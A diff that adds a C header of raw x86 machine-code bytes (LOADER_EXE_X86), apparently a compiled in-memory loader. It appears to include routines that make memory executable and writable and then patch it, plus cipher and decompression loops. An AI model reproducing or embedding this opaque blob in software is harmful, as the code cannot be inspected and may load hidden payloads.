710 0xeb, 0x20, 0x85, 0xc9, 0x75, 0x23, 0xff, 0x75, 0x18, 0xff, 0x75, 0x14,
711 0xff, 0x75, 0x10, 0xff, 0x75, 0x0c, 0x50, 0xff, 0x75, 0x08, 0xe8, 0x25,
712 0xe7, 0xff, 0xff, 0x8b, 0x36, 0x83, 0xc4, 0x18, 0x8b, 0xc8, 0x8b, 0x46,
713 0x18, 0x85, 0xc0, 0x75, 0xd9, 0x8b, 0xc1, 0x5e, 0x5d, 0xc3, 0x83, 0xec,
714 0x14, 0x53, 0x8b, 0x5c, 0x24, 0x20, 0x33, 0xc0, 0x55, 0x8b, 0x6c, 0x24,
715 0x28, 0x56, 0x57, 0x33, 0xff, 0x89, 0x44, 0x24, 0x2c, 0x33, 0xf6, 0x89,
716 0x74, 0x24, 0x10, 0x8b, 0x4c, 0x24, 0x28, 0x8a, 0x0c, 0x08, 0x84, 0xc9,
717 0x74, 0x11, 0x83, 0xf8, 0x40, 0x74, 0x0c, 0x88, 0x4c, 0x3c, 0x14, 0x47,
718 0x40, 0x89, 0x44, 0x24, 0x2c, 0xeb, 0x57, 0x6a, 0x10, 0x58, 0x2b, 0xc7,
719 0x8d, 0x74, 0x24, 0x14, 0x50, 0x03, 0xf7, 0x6a, 0x00, 0x56, 0xe8, 0xf7,
720 0x03, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0xc6, 0x06, 0x80, 0x83, 0xff, 0x0c,
721 0x72, 0x21, 0x55, 0x8d, 0x44, 0x24, 0x18, 0x53, 0x50, 0xe8, 0x5e, 0x00,
722 0x00, 0x00, 0x6a, 0x10, 0x33, 0xd8, 0x33, 0xea, 0x8d, 0x44, 0x24, 0x24,
723 0x6a, 0x00, 0x50, 0xe8, 0xce, 0x03, 0x00, 0x00, 0x83, 0xc4, 0x18, 0x8b,
724 0x44, 0x24, 0x2c, 0x8b, 0x74, 0x24, 0x10, 0xc1, 0xe0, 0x03, 0x46, 0x6a,
725 0x10, 0x89, 0x44, 0x24, 0x24, 0x5f, 0x89, 0x74, 0x24, 0x10, 0x83, 0xff,
726 0x10, 0x75, 0x15, 0x55, 0x8d, 0x44, 0x24, 0x18, 0x53, 0x50, 0xe8, 0x21,
727 0x00, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x33, 0xd8, 0x33, 0xea, 0x33, 0xff,
728 0x8b, 0x44, 0x24, 0x2c, 0x85, 0xf6, 0x0f, 0x84, 0x67, 0xff, 0xff, 0xff,
729 0x5f, 0x5e, 0x8b, 0xd5, 0x8b, 0xc3, 0x5d, 0x5b, 0x83, 0xc4, 0x14, 0xc3,
730 0x83, 0xec, 0x10, 0x8b, 0x44, 0x24, 0x18, 0x8b, 0x54, 0x24, 0x1c, 0x53,
731 0x55, 0x56, 0x8b, 0x74, 0x24, 0x20, 0x33, 0xdb, 0x57, 0x8d, 0x7c, 0x24,
732 0x10, 0xa5, 0xa5, 0xa5, 0xa5, 0x8b, 0x4c, 0x24, 0x14, 0x8b, 0x74, 0x24,
733 0x1c, 0x8b, 0x6c, 0x24, 0x18, 0x8b, 0x7c, 0x24, 0x10, 0x89, 0x4c, 0x24,
734 0x28, 0x8b, 0xce, 0xc1, 0xc8, 0x08, 0x8b, 0x74, 0x24, 0x28, 0x03, 0xc2,
735 0xc1, 0xce, 0x08, 0x33, 0xc7, 0x03, 0xf7, 0xc1, 0xc2, 0x03, 0x33, 0xf3,
736 0xc1, 0xc7, 0x03, 0x33, 0xd0, 0x89, 0x6c, 0x24, 0x28, 0x33, 0xfe, 0x8b,
737 0xe9, 0x43, 0x83, 0xfb, 0x1b, 0x72, 0xd6, 0x5f, 0x5e, 0x5d, 0x5b, 0x83,
738 0xc4, 0x10, 0xc3, 0x8b, 0x54, 0x24, 0x10, 0x83, 0xec, 0x14, 0x53, 0x8b,
739 0x5c, 0x24, 0x24, 0x85, 0xd2, 0x0f, 0x84, 0xe8, 0x00, 0x00, 0x00, 0x8b,
740 0x44, 0x24, 0x20, 0x55, 0x33, 0xed, 0x45, 0x56, 0x8d, 0x48, 0x0f, 0x2b,
741 0xe8, 0x57, 0x89, 0x4c, 0x24, 0x10, 0x89, 0x6c, 0x24, 0x34, 0x8b, 0xf0,
742 0x8d, 0x7c, 0x24, 0x14, 0x33, 0xc9, 0xa5, 0xa5, 0xa5, 0xa5, 0x8b, 0x74,
743 0x24, 0x28, 0x8b, 0x04, 0x8e, 0x31, 0x44, 0x8c, 0x14, 0x41, 0x83, 0xf9,
744 0x04, 0x72, 0xf3, 0x8b, 0x74, 0x24, 0x20, 0x8b, 0x44, 0x24, 0x1c, 0x8b,
745 0x7c, 0x24, 0x18, 0x8b, 0x4c, 0x24, 0x14, 0xc7, 0x44, 0x24, 0x30, 0x10,
746 0x00, 0x00, 0x00, 0x03, 0xcf, 0x03, 0xc6, 0xc1, 0xc7, 0x05, 0x33, 0xf9,
747 0xc1, 0xc6, 0x08, 0x33, 0xf0, 0xc1, 0xc1, 0x10, 0x03, 0xc7, 0x03, 0xce,
748 0xc1, 0xc7, 0x07, 0xc1, 0xc6, 0x0d, 0x33, 0xf8, 0x33, 0xf1, 0xc1, 0xc0,
749 0x10, 0x83, 0x6c, 0x24, 0x30, 0x01, 0x75, 0xd7, 0x8b, 0x6c, 0x24, 0x28,
750 0x89, 0x4c, 0x24, 0x14, 0x33, 0xc9, 0x89, 0x74, 0x24, 0x20, 0x89, 0x7c,
751 0x24, 0x18, 0x89, 0x44, 0x24, 0x1c, 0x8b, 0x44, 0x8d, 0x00, 0x31, 0x44,
752 0x8c, 0x14, 0x41, 0x83, 0xf9, 0x04, 0x72, 0xf2, 0x8b, 0x6c, 0x24, 0x34,
753 0x8b, 0xca, 0x6a, 0x10, 0x58, 0x3b, 0xd0, 0x0f, 0x47, 0xc8, 0x85, 0xc9,
754 0x74, 0x19, 0x8d, 0x7c, 0x24, 0x14, 0x8b, 0xf3, 0x2b, 0xfb, 0x8b, 0xe9,
755 0x8a, 0x04, 0x37, 0x30, 0x06, 0x46, 0x83, 0xed, 0x01, 0x75, 0xf5, 0x8b,
756 0x6c, 0x24, 0x34, 0x2b, 0xd1, 0x03, 0xd9, 0x8b, 0x4c, 0x24, 0x10, 0x80,
757 0x01, 0x01, 0x75, 0x08, 0x49, 0x8d, 0x04, 0x29, 0x85, 0xc0, 0x7f, 0xf3,
758 0x8b, 0x44, 0x24, 0x2c, 0x85, 0xd2, 0x0f, 0x85, 0x32, 0xff, 0xff, 0xff,
759 0x5f, 0x5e, 0x5d, 0x5b, 0x83, 0xc4, 0x14, 0xc3, 0x83, 0xec, 0x14, 0x8b,
760 0x4c, 0x24, 0x18, 0x83, 0x64, 0x24, 0x10, 0x00, 0x53, 0x55, 0x8b, 0x6c,
761 0x24, 0x24, 0x8a, 0x01, 0x56, 0x57, 0x88, 0x45, 0x00, 0x83, 0xcf, 0xff,
762 0x8d, 0x45, 0x01, 0x33, 0xf6, 0x89, 0x44, 0x24, 0x18, 0x33, 0xdb, 0x8d,
763 0x41, 0x01, 0x89, 0x5c, 0x24, 0x10, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x44,
764 0x24, 0x14, 0x50, 0xe8, 0x67, 0x01, 0x00, 0x00, 0x59, 0x85, 0xc0, 0x0f,
765 0x84, 0x32, 0x01, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x14, 0x50, 0xe8, 0x54,
766 0x01, 0x00, 0x00, 0x85, 0xc0, 0x8d, 0x44, 0x24, 0x18, 0x59, 0x50, 0x74,
767 0x7d, 0xe8, 0x45, 0x01, 0x00, 0x00, 0x59, 0x85, 0xc0, 0x74, 0x37, 0x6a,
768 0x04, 0x33, 0xf6, 0x5b, 0x8d, 0x44, 0x24, 0x14, 0x50, 0xe8, 0x31, 0x01,
769 0x00, 0x00, 0x59, 0x8d, 0x34, 0x70, 0x83, 0xeb, 0x01, 0x75, 0xed, 0x8b,
770 0x54, 0x24, 0x18, 0x85, 0xf6, 0x74, 0x0a, 0x8b, 0xc2, 0x2b, 0xc6, 0x8a,
771 0x00, 0x88, 0x02, 0xeb, 0x03, 0xc6, 0x02, 0x00, 0x8b, 0x5c, 0x24, 0x10,
772 0x42, 0xe9, 0xef, 0x00, 0x00, 0x00, 0x8b, 0x44, 0x24, 0x14, 0x8b, 0x54,
773 0x24, 0x18, 0x0f, 0xb6, 0x38, 0x40, 0x8b, 0xcf, 0x89, 0x44, 0x24, 0x14,
774 0x83, 0xe1, 0x01, 0x83, 0xc1, 0x02, 0xd1, 0xef, 0x74, 0x14, 0x8b, 0xf2,
775 0x2b, 0xf7, 0x8a, 0x06, 0x88, 0x02, 0x42, 0x46, 0x83, 0xe9, 0x01, 0x75,
776 0xf5, 0xe9, 0xa4, 0x00, 0x00, 0x00, 0x33, 0xdb, 0x43, 0x89, 0x5c, 0x24,
777 0x10, 0xe9, 0x9c, 0x00, 0x00, 0x00, 0xe8, 0xfc, 0x00, 0x00, 0x00, 0x8b,
778 0xd0, 0x59, 0x85, 0xf6, 0x75, 0x2b, 0x83, 0xfa, 0x02, 0x75, 0x26, 0x8d,
779 0x44, 0x24, 0x14, 0x50, 0xe8, 0xe6, 0x00, 0x00, 0x00, 0x8b, 0x54, 0x24,
780 0x1c, 0x8b, 0xf0, 0x59, 0x85, 0xf6, 0x74, 0x76, 0x8b, 0xca, 0x2b, 0xcf,
781 0x8a, 0x01, 0x88, 0x02, 0x42, 0x41, 0x83, 0xee, 0x01, 0x75, 0xf5, 0xeb,
782 0x61, 0x8b, 0x4c, 0x24, 0x14, 0x8d, 0x44, 0x24, 0x14, 0x83, 0xf6, 0x01,
783 0x2b, 0xd6, 0xc1, 0xe2, 0x08, 0x0f, 0xb6, 0x39, 0x81, 0xc7, 0x00, 0xfe,
784 0xff, 0xff, 0x03, 0xfa, 0x41, 0x50, 0x89, 0x4c, 0x24, 0x18, 0xe8, 0xa4,
785 0x00, 0x00, 0x00, 0x59, 0x8b, 0xc8, 0x81, 0xff, 0x00, 0x7d, 0x00, 0x00,
786 0x72, 0x01, 0x41, 0x8b, 0x54, 0x24, 0x18, 0x8d, 0x41, 0x01, 0x81, 0xff,
787 0x00, 0x05, 0x00, 0x00, 0x0f, 0x42, 0xc1, 0x81, 0xff, 0x80, 0x00, 0x00,
788 0x00, 0x8d, 0x70, 0x02, 0x0f, 0x43, 0xf0, 0x85, 0xf6, 0x74, 0x13, 0x8b,
789 0xca, 0x2b, 0xcf, 0x8a, 0x01, 0x88, 0x02, 0x42, 0x41, 0x83, 0xee, 0x01,
790 0x75, 0xf5, 0x89, 0x54, 0x24, 0x18, 0x33, 0xf6, 0x46, 0xeb, 0x18, 0x8b,
791 0x4c, 0x24, 0x14, 0x8b, 0x54, 0x24, 0x18, 0x8a, 0x01, 0x88, 0x02, 0x42,
792 0x41, 0x89, 0x4c, 0x24, 0x14, 0x33, 0xf6, 0x89, 0x54, 0x24, 0x18, 0x85,
793 0xdb, 0x0f, 0x84, 0x9b, 0xfe, 0xff, 0xff, 0x5f, 0x5e, 0x2b, 0xd5, 0x5d,
794 0x8b, 0xc2, 0x5b, 0x83, 0xc4, 0x14, 0xc3, 0x8b, 0x54, 0x24, 0x04, 0x8b,
795 0x4a, 0x0c, 0x8d, 0x41, 0xff, 0x89, 0x42, 0x0c, 0x85, 0xc9, 0x75, 0x13,
796 0x8b, 0x02, 0x8a, 0x08, 0x40, 0x89, 0x02, 0xc7, 0x42, 0x0c, 0x07, 0x00,
797 0x00, 0x00, 0x0f, 0xb6, 0xc1, 0xeb, 0x03, 0x8b, 0x42, 0x08, 0x8d, 0x0c,
798 0x00, 0xc1, 0xe8, 0x07, 0x89, 0x4a, 0x08, 0x83, 0xe0, 0x01, 0xc3, 0x56,
799 0x33, 0xf6, 0x46, 0xff, 0x74, 0x24, 0x08, 0xe8, 0xbf, 0xff, 0xff, 0xff,
800 0xff, 0x74, 0x24, 0x0c, 0x8d, 0x34, 0x70, 0xe8, 0xb3, 0xff, 0xff, 0xff,
801 0x59, 0x59, 0x85, 0xc0, 0x75, 0xe5, 0x8b, 0xc6, 0x5e, 0xc3, 0x8b, 0x54,
802 0x24, 0x0c, 0x8b, 0x44, 0x24, 0x04, 0x56, 0x8b, 0xf0, 0x85, 0xd2, 0x74,
803 0x13, 0x57, 0x8b, 0x7c, 0x24, 0x10, 0x2b, 0xf8, 0x8a, 0x0c, 0x37, 0x88,
804 0x0e, 0x46, 0x83, 0xea, 0x01, 0x75, 0xf5, 0x5f, 0x5e, 0xc3, 0x8a, 0x44,
805 0x24, 0x08, 0x8b, 0x4c, 0x24, 0x0c, 0x57, 0x8b, 0x7c, 0x24, 0x08, 0xf3,
806 0xaa, 0x8b, 0x44, 0x24, 0x08, 0x5f, 0xc3, 0x8b, 0x44, 0x24, 0x04, 0x8b,
807 0x4c, 0x24, 0x08, 0x53, 0x8a, 0x10, 0x84, 0xd2, 0x74, 0x0e, 0x8a, 0x19,
808 0x84, 0xdb, 0x74, 0x08, 0x3a, 0xd3, 0x75, 0x04, 0x40, 0x41, 0xeb, 0xec,
809 0x0f, 0xbe, 0x00, 0x0f, 0xbe, 0x09, 0x2b, 0xc1, 0x5b, 0xc3};
810
+808
-0
loader_exe_x86.h less more
0
1 unsigned char LOADER_EXE_X86[] = {
2 0x81, 0xec, 0xcc, 0x02, 0x00, 0x00, 0x53, 0x55, 0x56, 0x8b, 0xb4, 0x24,
3 0xdc, 0x02, 0x00, 0x00, 0x33, 0xdb, 0x57, 0x8b, 0xfb, 0x8b, 0x86, 0x38,
4 0x02, 0x00, 0x00, 0x0b, 0x86, 0x3c, 0x02, 0x00, 0x00, 0x0f, 0x84, 0xd4,
5 0x00, 0x00, 0x00, 0xff, 0x76, 0x2c, 0xff, 0x76, 0x28, 0xff, 0xb6, 0x8c,
6 0x00, 0x00, 0x00, 0xff, 0xb6, 0x88, 0x00, 0x00, 0x00, 0x56, 0xe8, 0xb8,
7 0x20, 0x00, 0x00, 0x8b, 0xf8, 0x83, 0xc4, 0x14, 0x85, 0xff, 0x0f, 0x84,
8 0xaa, 0x00, 0x00, 0x00, 0x53, 0x53, 0x56, 0xe8, 0x99, 0x20, 0x00, 0x00,
9 0x8b, 0xc8, 0xb8, 0x12, 0x21, 0x40, 0x00, 0x2d, 0xed, 0x30, 0x40, 0x00,
10 0x03, 0xc8, 0x51, 0x53, 0x53, 0xff, 0xd7, 0xff, 0x76, 0x2c, 0x8b, 0xf8,
11 0xff, 0x76, 0x28, 0xff, 0xb6, 0xac, 0x01, 0x00, 0x00, 0xff, 0xb6, 0xa8,
12 0x01, 0x00, 0x00, 0x56, 0xe8, 0x76, 0x20, 0x00, 0x00, 0xff, 0x76, 0x2c,
13 0x8b, 0xe8, 0xff, 0x76, 0x28, 0xff, 0xb6, 0x94, 0x00, 0x00, 0x00, 0xff,
14 0xb6, 0x90, 0x00, 0x00, 0x00, 0x56, 0xe8, 0x5c, 0x20, 0x00, 0x00, 0xff,
15 0x76, 0x2c, 0x8b, 0xd8, 0xff, 0x76, 0x28, 0xff, 0xb6, 0x9c, 0x00, 0x00,
16 0x00, 0xff, 0xb6, 0x98, 0x00, 0x00, 0x00, 0x56, 0xe8, 0x42, 0x20, 0x00,
17 0x00, 0x83, 0xc4, 0x3c, 0x85, 0xed, 0x74, 0x46, 0x85, 0xdb, 0x74, 0x42,
18 0x85, 0xc0, 0x74, 0x3e, 0x8d, 0x4c, 0x24, 0x10, 0xc7, 0x44, 0x24, 0x10,
19 0x07, 0x00, 0x01, 0x00, 0x51, 0xff, 0xd0, 0x50, 0xff, 0xd3, 0x8b, 0x86,
20 0x38, 0x02, 0x00, 0x00, 0x83, 0xa4, 0x24, 0xd4, 0x00, 0x00, 0x00, 0xfc,
21 0x89, 0x84, 0x24, 0xc8, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x10, 0x6a,
22 0x00, 0x50, 0xff, 0xd5, 0xeb, 0x0c, 0x83, 0xc8, 0xff, 0xeb, 0x09, 0x56,
23 0xe8, 0x11, 0x10, 0x00, 0x00, 0x59, 0x8b, 0xc7, 0x5f, 0x5e, 0x5d, 0x5b,
24 0x81, 0xc4, 0xcc, 0x02, 0x00, 0x00, 0xc3, 0x8b, 0x44, 0x24, 0x04, 0x83,
25 0xc0, 0x04, 0xf0, 0xff, 0x00, 0x8b, 0x00, 0xc2, 0x04, 0x00, 0xb8, 0x01,
26 0x40, 0x00, 0x80, 0xc2, 0x08, 0x00, 0x56, 0x57, 0xe8, 0xc0, 0x1f, 0x00,
27 0x00, 0x8b, 0x74, 0x24, 0x10, 0xb9, 0x9d, 0x11, 0x40, 0x00, 0xbf, 0xed,
28 0x30, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x08, 0xe8,
29 0xa5, 0x1f, 0x00, 0x00, 0xb9, 0x0f, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03,
30 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x04, 0xe8, 0x92, 0x1f, 0x00, 0x00, 0xb9,
31 0xfc, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
32 0x08, 0xe8, 0x7f, 0x1f, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b,
33 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x0c, 0xe8, 0x6c, 0x1f, 0x00,
34 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06,
35 0x5f, 0x89, 0x48, 0x10, 0x8b, 0x44, 0x24, 0x08, 0x83, 0x66, 0x04, 0x00,
36 0x89, 0x46, 0x08, 0x5e, 0xc3, 0x8b, 0x4c, 0x24, 0x0c, 0x85, 0xc9, 0x75,
37 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x4d, 0x53, 0x8b, 0x5c, 0x24,
38 0x0c, 0x33, 0xd2, 0x56, 0x8b, 0x74, 0x24, 0x0c, 0x57, 0x8b, 0x7e, 0x08,
39 0x8b, 0x84, 0x97, 0xf4, 0x05, 0x00, 0x00, 0x3b, 0x04, 0x93, 0x75, 0x08,
40 0x42, 0x83, 0xfa, 0x04, 0x75, 0xee, 0xeb, 0x14, 0x33, 0xd2, 0x8b, 0x84,
41 0x97, 0xb4, 0x06, 0x00, 0x00, 0x3b, 0x04, 0x93, 0x75, 0x10, 0x42, 0x83,
42 0xfa, 0x04, 0x75, 0xee, 0x89, 0x31, 0xf0, 0xff, 0x46, 0x04, 0x33, 0xc0,
43 0xeb, 0x08, 0x83, 0x21, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0x5f, 0x5e,
44 0x5b, 0xc2, 0x0c, 0x00, 0x8b, 0x4c, 0x24, 0x04, 0x83, 0xc8, 0xff, 0xf0,
45 0x0f, 0xc1, 0x41, 0x04, 0x48, 0xc2, 0x04, 0x00, 0x33, 0xc0, 0xc2, 0x08,
46 0x00, 0x55, 0x8b, 0xec, 0xf6, 0x45, 0x10, 0x02, 0x56, 0x8b, 0x75, 0x08,
47 0x57, 0x74, 0x15, 0x8b, 0x7d, 0x18, 0x85, 0xff, 0x74, 0x1b, 0x8b, 0x46,
48 0x1c, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x04, 0x8b, 0x46, 0x1c, 0x89, 0x07,
49 0xf6, 0x45, 0x10, 0x01, 0x74, 0x19, 0x8b, 0x7d, 0x14, 0x85, 0xff, 0x75,
50 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x0d, 0x83, 0xc6, 0x14, 0x56,
51 0x8b, 0x06, 0xff, 0x50, 0x04, 0x89, 0x37, 0x33, 0xc0, 0x5f, 0x5e, 0x5d,
52 0xc2, 0x14, 0x00, 0x8b, 0x44, 0x24, 0x04, 0x8b, 0x40, 0x2c, 0xff, 0x50,
53 0x54, 0x8b, 0x4c, 0x24, 0x08, 0x89, 0x01, 0x33, 0xc0, 0xc2, 0x08, 0x00,
54 0x56, 0x57, 0xe8, 0x76, 0x1e, 0x00, 0x00, 0x8b, 0x74, 0x24, 0x10, 0xb9,
55 0xae, 0x13, 0x40, 0x00, 0xbf, 0xed, 0x30, 0x40, 0x00, 0x2b, 0xcf, 0x03,
56 0xc8, 0x8b, 0x06, 0x89, 0x08, 0xe8, 0x5b, 0x1e, 0x00, 0x00, 0xb9, 0x0f,
57 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x04,
58 0xe8, 0x48, 0x1e, 0x00, 0x00, 0xb9, 0xfc, 0x11, 0x40, 0x00, 0x2b, 0xcf,
59 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x08, 0xe8, 0x35, 0x1e, 0x00, 0x00,
60 0xb9, 0x5b, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
61 0x48, 0x0c, 0xe8, 0x22, 0x1e, 0x00, 0x00, 0xb9, 0x11, 0x12, 0x40, 0x00,
62 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x10, 0xe8, 0x0f, 0x1e,
63 0x00, 0x00, 0xb9, 0x0c, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
64 0x06, 0x89, 0x48, 0x14, 0xe8, 0xfc, 0x1d, 0x00, 0x00, 0xb9, 0xa9, 0x13,
65 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x18, 0xe8,
66 0xe9, 0x1d, 0x00, 0x00, 0xb9, 0x0c, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03,
67 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x1c, 0xe8, 0xd6, 0x1d, 0x00, 0x00, 0xb9,
68 0x5e, 0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
69 0x20, 0xe8, 0xc3, 0x1d, 0x00, 0x00, 0xb9, 0x59, 0x13, 0x40, 0x00, 0x2b,
70 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x24, 0xe8, 0xb0, 0x1d, 0x00,
71 0x00, 0xb9, 0x59, 0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06,
72 0x5f, 0x89, 0x48, 0x28, 0x8b, 0x44, 0x24, 0x08, 0x83, 0x66, 0x04, 0x00,
73 0x89, 0x46, 0x2c, 0x5e, 0xc3, 0x33, 0xc0, 0xc2, 0x04, 0x00, 0x55, 0x8b,
74 0xec, 0x83, 0xec, 0x2c, 0x33, 0xc0, 0x56, 0x6a, 0x20, 0x50, 0x89, 0x45,
75 0xf4, 0x89, 0x45, 0xf8, 0x89, 0x45, 0xfc, 0x8d, 0x45, 0xd4, 0x50, 0xe8,
76 0x02, 0x22, 0x00, 0x00, 0x8b, 0x75, 0x0c, 0x8d, 0x4d, 0xd4, 0x83, 0xc4,
77 0x0c, 0x8b, 0x06, 0x51, 0x56, 0xff, 0x50, 0x0c, 0x85, 0xc0, 0x75, 0x12,
78 0x8b, 0x06, 0x8d, 0x4d, 0xfc, 0x51, 0x8d, 0x4d, 0xf8, 0x51, 0x8d, 0x4d,
79 0xf4, 0x51, 0x56, 0xff, 0x50, 0x10, 0x33, 0xc0, 0x5e, 0xc9, 0xc2, 0x08,
80 0x00, 0x33, 0xc0, 0xc2, 0x0c, 0x00, 0x8b, 0x4c, 0x24, 0x0c, 0x85, 0xc9,
81 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x6c, 0x8b, 0x54, 0x24,
82 0x04, 0x53, 0x8b, 0x5c, 0x24, 0x0c, 0x56, 0x57, 0x8b, 0x7a, 0x2c, 0x33,
83 0xf6, 0x8b, 0x84, 0xb7, 0xf4, 0x05, 0x00, 0x00, 0x3b, 0x04, 0xb3, 0x75,
84 0x08, 0x46, 0x83, 0xfe, 0x04, 0x75, 0xee, 0xeb, 0x14, 0x33, 0xf6, 0x8b,
85 0x84, 0xb7, 0xa4, 0x06, 0x00, 0x00, 0x3b, 0x04, 0xb3, 0x75, 0x0e, 0x46,
86 0x83, 0xfe, 0x04, 0x75, 0xee, 0x89, 0x11, 0xf0, 0xff, 0x42, 0x04, 0xeb,
87 0x1d, 0x33, 0xf6, 0x8b, 0x84, 0xb7, 0xb4, 0x06, 0x00, 0x00, 0x3b, 0x04,
88 0xb3, 0x75, 0x13, 0x46, 0x83, 0xfe, 0x04, 0x75, 0xee, 0x8d, 0x42, 0x08,
89 0x89, 0x01, 0xf0, 0xff, 0x42, 0x0c, 0x33, 0xc0, 0xeb, 0x08, 0x83, 0x21,
90 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0x5f, 0x5e, 0x5b, 0xc2, 0x0c, 0x00,
91 0x8b, 0x44, 0x24, 0x18, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc2, 0x18, 0x00,
92 0x8b, 0x44, 0x24, 0x04, 0x0f, 0xaf, 0x44, 0x24, 0x08, 0xc3, 0x8b, 0x44,
93 0x24, 0x14, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc2, 0x14, 0x00, 0x8b, 0x44,
94 0x24, 0x04, 0x03, 0x44, 0x24, 0x08, 0xc3, 0x51, 0x53, 0x56, 0x8b, 0x74,
95 0x24, 0x10, 0x8d, 0x86, 0x58, 0x03, 0x00, 0x00, 0x50, 0xff, 0x56, 0x30,
96 0x8b, 0xd8, 0x85, 0xdb, 0x75, 0x06, 0x40, 0xe9, 0xc5, 0x00, 0x00, 0x00,
97 0x55, 0x57, 0x8d, 0x86, 0xc0, 0x05, 0x00, 0x00, 0x50, 0x53, 0xff, 0x56,
98 0x34, 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0xaa, 0x00, 0x00, 0x00, 0xbf,
99 0x38, 0x14, 0x40, 0x00, 0x81, 0xef, 0x2c, 0x14, 0x40, 0x00, 0x0f, 0x88,
100 0x99, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a, 0x40, 0x57,
101 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x85, 0x00, 0x00, 0x00,
102 0x57, 0xe8, 0x37, 0x1c, 0x00, 0x00, 0xb9, 0x2c, 0x14, 0x40, 0x00, 0x81,
103 0xe9, 0xed, 0x30, 0x40, 0x00, 0x03, 0xc1, 0x50, 0x55, 0xe8, 0x90, 0x20,
104 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10, 0x50, 0xff, 0x74,
105 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x8d, 0x86, 0xd0, 0x05, 0x00,
106 0x00, 0x50, 0x53, 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed, 0x74, 0x49,
107 0xbf, 0x4e, 0x14, 0x40, 0x00, 0xbb, 0x42, 0x14, 0x40, 0x00, 0x2b, 0xfb,
108 0x78, 0x3b, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a, 0x40, 0x57, 0x55, 0xff,
109 0x56, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x57, 0xe8, 0xdd, 0x1b, 0x00, 0x00,
110 0x81, 0xeb, 0xed, 0x30, 0x40, 0x00, 0x03, 0xc3, 0x50, 0x55, 0xe8, 0x3b,
111 0x20, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10, 0x50, 0xff,
112 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x33, 0xc0, 0x40, 0xeb,
113 0x02, 0x33, 0xc0, 0x5f, 0x5d, 0x5e, 0x5b, 0x59, 0xc3, 0x51, 0x53, 0x56,
114 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x86, 0x64, 0x03, 0x00, 0x00, 0x50, 0xff,
115 0x56, 0x30, 0x8b, 0xd8, 0x85, 0xdb, 0x75, 0x06, 0x40, 0xe9, 0xc5, 0x00,
116 0x00, 0x00, 0x55, 0x57, 0x8d, 0x86, 0x70, 0x05, 0x00, 0x00, 0x50, 0x53,
117 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0xaa, 0x00, 0x00,
118 0x00, 0xbf, 0xc8, 0x30, 0x40, 0x00, 0x81, 0xef, 0xa9, 0x13, 0x40, 0x00,
119 0x0f, 0x88, 0x99, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a,
120 0x40, 0x57, 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x85, 0x00,
121 0x00, 0x00, 0x57, 0xe8, 0x51, 0x1b, 0x00, 0x00, 0xb9, 0xa9, 0x13, 0x40,
122 0x00, 0x81, 0xe9, 0xed, 0x30, 0x40, 0x00, 0x03, 0xc1, 0x50, 0x55, 0xe8,
123 0xaa, 0x1f, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10, 0x50,
124 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x8d, 0x86, 0x90,
125 0x05, 0x00, 0x00, 0x50, 0x53, 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed,
126 0x74, 0x49, 0xbf, 0xbf, 0x30, 0x40, 0x00, 0xbb, 0xb0, 0x30, 0x40, 0x00,
